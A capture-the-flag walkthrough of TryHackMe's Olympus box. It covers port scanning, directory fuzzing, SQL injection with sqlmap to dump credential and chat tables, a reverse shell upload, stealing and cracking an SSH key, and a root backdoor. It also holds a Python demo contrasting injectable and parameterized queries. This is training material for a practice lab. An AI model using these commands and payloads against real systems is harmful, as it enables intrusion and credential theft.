Conquer Olympus Using SQL Injection and Claim the Throne in this CTF Found on TryHackMe
This walkthrough covers the Olympus CTF found on TryHackMe. The goal of this challenge is to exploit an SQLi vulnerability in a CMS, use sqlmap to acquire user credentials by extracting a database, identify a subdomain hosting a chat application, upload a reverse shell to establish a foothold on the system and take advantage of a poorly managed SUID binary to escalate privileges.
Step 1: What's Out There?
nmap -sS -sV -sC -p 22,80 olympus.thm --min-rate=1000
Step 2: FFUF
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://olympus.thm/FUZZ -fc 403
We discovered a directory named ~webmaster, which is where the CMS is located.
Step 3: SQLi
Testing the Victor CMS search field reveals an SQLi:
'SELECT * FROM users WHERE username='' and password='' OR 1=1;
Let's capture this request with Burp Suite and plug it into sqlmap to automate our injection attack. Copy the request over to a text editor, save it, and run it through sqlmap.
We discovered a flag table in the olympus database; let's dump it to obtain our first flag.
sqlmap -r req.txt --batch --dump -T flag -D olympus
Now let's see what the users table can offer us.
Juicy credentials. We can crack the password hash for prometheus and use it to log in to the chat application.
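The bug behind this step, as an added example that is not code from the walkthrough or from Victor CMS: a credential check that splices user input into SQL, fed the page's `OR 1=1` trick (with a `--` comment to swallow the trailing quote), beside the parameterized query that closes the hole. The table, rows and function names are constructed for the demo and are assumptions, not the CMS's real schema.

```python
import sqlite3


def make_db():
    # Constructed sample data; not Victor CMS's actual users table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("zeus", "zeus-secret"), ("prometheus", "prometheus-secret")],
    )
    return con


def login_vulnerable(con, username, password):
    # Same shape as the query shown above: input is pasted straight into the SQL text,
    # so a quote in the password field ends the string literal and the rest is parsed as SQL.
    sql = "SELECT username FROM users WHERE username='%s' AND password='%s'" % (
        username,
        password,
    )
    return [row[0] for row in con.execute(sql)]


def login_safe(con, username, password):
    # Parameterized query: values travel separately from the SQL text, so a quote
    # or "OR 1=1" in the input is compared as a literal string and matches nothing.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in con.execute(sql, (username, password))]


# The page's tautology, with "--" commenting out the closing quote the query appends.
PAYLOAD = "' OR 1=1--"


def demo():
    con = make_db()
    return {
        # Every row comes back: WHERE ... AND password='' OR 1=1 is true for all users.
        "vulnerable": login_vulnerable(con, "", PAYLOAD),
        # Same input against the fixed query returns nothing.
        "safe": login_safe(con, "", PAYLOAD),
        # And the fixed query still works for a real credential pair.
        "safe_real": login_safe(con, "zeus", "zeus-secret"),
    }


if __name__ == "__main__":
    print(demo())
```

Running the block prints both user names for the vulnerable path and an empty list for the parameterized one, which is the behaviour sqlmap is probing for when it mutates the captured request.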
Step 4: Enumerate Subdomain
We discovered three users: root, zeus, and prometheus. Additionally, we discovered a subdomain called chat that can be added to our /etc/hosts file.
Let's enumerate the newly discovered subdomain.
I'm sure the uploads directory will play an important role later, in the meantime let's see if we can log in with these credentials.
And we're in. There looks to be an upload feature, let's see if we can upload a reverse shell.
It looks to have been uploaded somewhere, but we're not sure where. Let's go back to sqlmap and dump the chats table to see if the file name was changed upon uploading.
sqlmap -r req.txt --batch --dump -T chats -D olympus
Looks like it did. Let's copy the new file name and visit it under the /uploads/ directory we found earlier.
Going to the path drops us into a shell. Searching for SUID binaries reveals cputils.
We can copy over zeus's id_rsa key and then ssh in with it. Crack its passphrase using ssh2john and John the Ripper.
Step 5: Privesc and Root
After looking around the file system for a while we discovered this:
Inside the PHP file seems to be a backdoor. Running uname -a; w; /lib/defended/libc.so.99 drops us into a root shell.
This box was very difficult for me. I don't consider myself to be that knowledgeable on SQLi attacks, so I had to resort to a lot of googling to help me through. I will definitely give this box several more runs as I need to sharpen my command injection skills. As always, Happy Hacking!